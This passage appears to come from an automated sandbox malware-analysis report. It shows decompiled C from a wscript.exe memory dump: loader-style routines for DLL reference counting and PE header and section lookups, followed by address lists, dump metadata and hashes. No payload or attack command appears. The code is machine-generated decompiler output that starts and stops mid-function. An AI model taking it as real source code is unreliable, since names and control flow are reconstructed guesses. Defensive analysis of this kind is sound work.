											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2a73018
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0595FFB0(_t287, _t353, 0x5a384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0599CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E05956600(0x5a352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E05957926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x5a3b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E059CE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x5a38472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x5a3b218; // 0x0
														asm("ror edi, cl");
														 *0x5a3b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E05962280(_t250, 0x5a384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L05983898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0595FFB0(_t293, _t353, 0x5a384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E059837F5(_t353, 0);
																}
																E05980413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E05979B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E059702D6(_t174);
																}
																L059677F0( *0x5a37b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0597C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0595EC7F(_t353);
										L059719B8(_t287, 0, _t353, 0);
										_t200 = E0594F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0598B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x5a3b2f8; // 0x880000
									if((_t206 |  *0x5a3b2fc) == 0 || ( *0x5a3b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x5a3b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E059F6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E059F6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0595E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0595EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E05989730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0595E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L05958F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E05983C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0595d5f2
0x0595d5f5
0x0595d5f5
0x0595d5fd
0x0595d600
0x0595d60a
0x0595d60d
0x0595d617
0x0595d61d
0x0595d627
0x0595d62e
0x0595d911
0x0595d913
0x00000000
0x0595d919
0x0595d919
0x0595d919
0x0595d634
0x0595d634
0x0595d634
0x0595d634
0x0595d640
0x0595d8bf
0x00000000
0x0595d646
0x0595d646
0x0595d64d
0x0595d652
0x059ab2fc
0x059ab2fc
0x059ab302
0x059ab33b
0x059ab341
0x00000000
0x059ab304
0x059ab304
0x059ab319
0x059ab31e
0x059ab324
0x059ab326
0x059ab332
0x059ab347
0x059ab34c
0x059ab351
0x059ab35a
0x00000000
0x059ab328
0x059ab328
0x00000000
0x059ab328
0x059ab326
0x0595d658
0x0595d658
0x0595d65b
0x0595d665
0x00000000
0x0595d66b
0x0595d66b
0x0595d66b
0x0595d66b
0x0595d66d
0x0595d672
0x0595d67a
0x00000000
0x00000000
0x0595d680
0x0595d686
0x0595d8ce
0x0595d8d4
0x0595d8dd
0x0595d8e0
0x0595d68c
0x0595d691
0x0595d69d
0x0595d6a2
0x0595d6a7
0x0595d6b0
0x0595d6b5
0x0595d6e0
0x0595d6b7
0x0595d6b7
0x0595d6b9
0x0595d6b9
0x0595d6bb
0x0595d6bd
0x0595d6ce
0x0595d6d0
0x0595d6d2
0x059ab363
0x059ab365
0x00000000
0x059ab36b
0x00000000
0x059ab36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0595d6bf
0x0595d6bf
0x0595d6e5
0x0595d6e7
0x0595d6e9
0x0595d6ec
0x0595d6ec
0x0595d6ef
0x0595d6f5
0x0595d6f9
0x0595d6fb
0x0595d6fd
0x0595d701
0x0595d703
0x0595d70a
0x0595d70a
0x0595d701
0x0595d710
0x0595d710
0x0595d6c1
0x0595d6c1
0x0595d6c6
0x059ab36d
0x059ab36f
0x00000000
0x059ab375
0x059ab375
0x059ab375
0x00000000
0x059ab375
0x00000000
0x0595d6cc
0x0595d6d8
0x0595d6d8
0x0595d6d8
0x00000000
0x0595d6c6
0x0595d6bf
0x00000000
0x0595d6da
0x0595d6da
0x0595d716
0x0595d71b
0x0595d720
0x0595d726
0x0595d726
0x0595d72d
0x00000000
0x0595d733
0x0595d739
0x0595d742
0x0595d750
0x0595d758
0x0595d764
0x0595d776
0x0595d77a
0x0595d783
0x0595d928
0x0595d92c
0x0595d93d
0x0595d944
0x0595d94f
0x0595d954
0x0595d956
0x0595d95f
0x0595d961
0x0595d973
0x0595d973
0x0595d956
0x0595d944
0x0595d92c
0x0595d78b
0x059ab394
0x0595d791
0x0595d798
0x059ab3a3
0x059ab3bb
0x059ab3bb
0x0595d7a5
0x0595d866
0x0595d870
0x0595d884
0x0595d892
0x0595d898
0x0595d89e
0x0595d8a0
0x0595d8a6
0x0595d8ac
0x0595d8ae
0x0595d8b4
0x0595d8b4
0x0595d8ae
0x0595d7a5
0x0595d78b
0x0595d7b1
0x059ab3c5
0x059ab3c5
0x0595d7c3
0x0595d7ca
0x0595d7e5
0x0595d7eb
0x0595d8eb
0x0595d8ed
0x00000000
0x0595d8f3
0x0595d8f3
0x0595d8f3
0x00000000
0x0595d8ed
0x0595d7cc
0x0595d7cc
0x0595d7d2
0x00000000
0x0595d7d4
0x0595d7d4
0x0595d7d7
0x0595d7df
0x059ab3d4
0x059ab3d9
0x059ab3dc
0x059ab3dc
0x059ab3df
0x059ab3e2
0x059ab468
0x059ab46d
0x059ab46f
0x059ab46f
0x059ab475
0x0595d8f8
0x0595d8f9
0x0595d8fd
0x059ab3e8
0x059ab3e8
0x059ab3eb
0x059ab3ed
0x00000000
0x059ab3ef
0x059ab3ef
0x059ab3f1
0x059ab3f4
0x059ab3fe
0x059ab404
0x059ab409
0x059ab40e
0x059ab410
0x059ab410
0x059ab414
0x059ab414
0x059ab41b
0x059ab420
0x059ab423
0x059ab425
0x059ab427
0x059ab42a
0x059ab42d
0x059ab42d
0x059ab42a
0x059ab432
0x059ab436
0x059ab438
0x059ab43b
0x059ab43b
0x059ab449
0x059ab44e
0x059ab454
0x059ab458
0x059ab458
0x059ab45d
0x00000000
0x059ab45d
0x059ab3ed
0x00000000
0x00000000
0x00000000
0x0595d7df
0x0595d7d2
0x0595d7ca
0x059ab37c
0x059ab37e
0x059ab385
0x059ab38a
0x00000000
0x059ab38a
0x0595d742
0x0595d7f1
0x0595d7f8
0x059ab49b
0x059ab49b
0x0595d800
0x0595d837
0x0595d843
0x0595d845
0x0595d847
0x0595d84a
0x0595d84b
0x0595d84e
0x0595d857
0x0595d802
0x0595d802
0x0595d80d
0x00000000
0x0595d818
0x0595d818
0x0595d824
0x0595d831
0x059ab4a5
0x059ab4ab
0x059ab4b3
0x059ab4b8
0x059ab4bb
0x00000000
0x059ab4c1
0x059ab4c1
0x059ab4c8
0x00000000
0x059ab4ce
0x059ab4d4
0x059ab4e1
0x059ab4e3
0x059ab4e5
0x00000000
0x059ab4eb
0x059ab4f0
0x059ab4f2
0x0595dac9
0x0595dacc
0x0595dacf
0x0595dad1
0x0595dd78
0x0595dd78
0x0595dcf2
0x00000000
0x0595dad7
0x0595dad9
0x0595dadb
0x00000000
0x00000000
0x0595dae1
0x0595dae1
0x0595dae4
0x0595dae6
0x059ab4f9
0x059ab4f9
0x059ab500
0x0595daec
0x0595daec
0x0595daf5
0x0595daf8
0x0595dafb
0x0595db03
0x0595db11
0x0595db16
0x0595db19
0x0595db1b
0x059ab52c
0x059ab531
0x059ab534
0x0595db21
0x0595db21
0x0595db24
0x0595dcd9
0x0595dce2
0x0595dce5
0x0595dd6a
0x0595dd6d
0x00000000
0x0595dd73
0x059ab51a
0x059ab51c
0x059ab51f
0x059ab524
0x00000000
0x059ab524
0x0595dce7
0x0595dce7
0x0595dce7
0x00000000
0x0595dce7
0x00000000
0x0595db2a
0x0595db2c
0x0595db31
0x0595db33
0x0595db36
0x0595db39
0x0595db3b
0x0595db66
0x0595db66
0x0595db3d
0x0595db3d
0x0595db3e
0x0595db46
0x0595db47
0x0595db49
0x0595db4c
0x0595db53
0x0595db55
0x0595db58
0x0595db5a
0x059ab50a
0x059ab50f
0x059ab512
0x0595db60
0x0595db60
0x0595db63
0x0595db63
0x00000000
0x0595db63
0x0595db5a
0x0595db3b
0x0595db24
0x0595db69
0x0595db69
0x0595db6c
0x0595db6f
0x0595db74
0x059ab557
0x059ab557
0x059ab55e
0x0595db7a
0x0595db7c
0x0595db7f
0x0595db82
0x0595db85
0x00000000
0x0595db8b
0x0595db8b
0x0595db8d
0x0595db9b
0x0595db9b
0x0595db9d
0x0595dba0
0x0595dba2
0x0595dba4
0x0595dba7
0x0595dba9
0x0595dbae
0x0595dbae
0x0595dbb1
0x0595dbb4
0x0595dbb4
0x0595dbb7
0x0595dbba
0x0595dcd2
0x0595dcd4
0x00000000
0x0595dbc0
0x0595dbc0
0x0595dbd2
0x0595dbd7
0x0595dbda
0x0595dbdd
0x0595dbdf
0x00000000
0x0595dbe5
0x0595dbe5
0x0595dbee
0x0595dbf1
0x059ab541
0x059ab544
0x00000000
0x059ab546
0x059ab546
0x00000000
0x059ab546
0x0595dbf7
0x0595dbf7
0x0595dbfd
0x0595dbfd
0x0595dbff
0x0595dc0b
0x0595dc15
0x0595dc1b
0x0595dc1d
0x0595dc21
0x0595dc21
0x0595dc23
0x0595dc23
0x0595dc26
0x0595dc29
0x0595dc2b
0x00000000
0x00000000
0x0595dc31
0x0595dc34
0x0595dc36
0x0595dcbf
0x0595dcbf
0x0595dcc2
0x00000000
0x0595dc3c
0x0595dc41
0x0595dc43
0x00000000
0x0595dc45
0x0595dc45
0x0595dc47
0x00000000
0x0595dc4d
0x0595dc4d
0x0595dc50
0x0595dc52
0x0595dc55
0x0595dcfa
0x0595dcfe
0x0595dd08
0x0595dd0a
0x0595dd0c
0x00000000
0x0595dd12
0x0595dd15
0x0595dd2d
0x0595dd2f
0x0595dd32
0x0595dd35
0x00000000
0x0595dd35
0x0595dc5b
0x0595dc5b
0x0595dc5e
0x0595dc61
0x0595dc64
0x0595dc67
0x0595dc67
0x0595dc6a
0x0595dc6c
0x0595dc8e
0x0595dc8e
0x0595dc91
0x0595dc93
0x0595dcce
0x0595dcce
0x0595dc95
0x0595dc9c
0x0595dc6e
0x0595dc72
0x0595dc75
0x0595dc77
0x0595dc79
0x059ab551
0x059ab551
0x00000000
0x0595dc7f
0x0595dc7f
0x0595dc81
0x00000000
0x0595dc83
0x0595dc86
0x0595dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0595dc88
0x0595dc81
0x0595dc79
0x0595dc6c
0x0595dc55
0x0595dc47
0x0595dc43
0x00000000
0x0595dc36
0x0595dc23
0x00000000
0x0595dbff
0x0595dbf1
0x0595dbdf
0x0595db8f
0x0595db92
0x0595db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0595db95
0x0595db8d
0x0595db85
0x0595db74
0x0595dc9f
0x0595dca2
0x0595dcb0
0x0595dcb0
0x0595dad1
0x059ab4e5
0x059ab4c8
0x00000000
0x00000000
0x00000000
0x0595d831
0x0595d80d
0x00000000
0x0595d800
0x059ab47f
0x059ab485
0x00000000
0x059ab485
0x0595d665
0x0595d652
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0de915b33bc83e77ffebe9cdac54cb91ae2ea3a8aecce491e495c3983eedcac
Instruction ID: f68adedb3bbfbe840d59b16590dc90f45be708e2f0cd04146bcf65abedb9677e
Opcode Fuzzy Hash: b0de915b33bc83e77ffebe9cdac54cb91ae2ea3a8aecce491e495c3983eedcac
Instruction Fuzzy Hash: C0E1D071B05359CFDB24CF24C884B69B7BBBF85324F080199ED0A97290DB34AA95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0595849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0595849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x5a1f9c0);
				E0599D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x5a37b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0595CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E05962280( *[fs:0x30], 0x5a38550);
						_t139 =  *0x5a37b04; // 0x2
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0597F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0595FFB0(_t193, _t235, 0x5a38550);
								L5:
								return E0599D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E05941C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x5a37b9c; // 0x0
							_t235 = L05964620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x5a37b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0597A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0595FFB0(_t193, _t235, 0x5a38550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L059677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L059677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x5a37b04; // 0x2
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x5a37b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E059837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x5a37b9c; // 0x0
									_t214 = L05964620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E059837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x5a37b10 =  *0x5a37b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x5a37b04 =  *0x5a37b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L059677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L059677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x5a37b08 =  *0x5a37b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
